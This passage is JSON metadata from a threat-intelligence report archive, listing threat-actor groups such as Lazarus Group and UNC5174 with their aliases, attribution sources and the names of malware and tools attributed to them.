"UNC5174 " ], "source_name": "Secureworks:BRONZE SNOWDROP", "tools": [ "Metasploit", "SNOWLIGHT", "SUPERSHELL", "Sliver", "VShell" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "650a9c54-160c-4a25-8e96-e845f2dd6f82", "created_at": "2026-01-18T02:00:03.063535Z", "updated_at": "2026-04-10T02:00:03.901997Z", "deleted_at": null, "main_name": "Earth Lamia", "aliases": [ "UNC5454" ], "source_name": "MISPGALAXY:Earth Lamia", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "376d1479-0ddf-477c-96eb-afdd8f365fec", "created_at": "2026-01-20T02:00:03.662195Z", "updated_at": "2026-04-10T02:00:03.913032Z", "deleted_at": null, "main_name": "UNC5342", "aliases": [], "source_name": "MISPGALAXY:UNC5342", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434030, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.pdf", "text": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.txt", "img": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.jpg" } }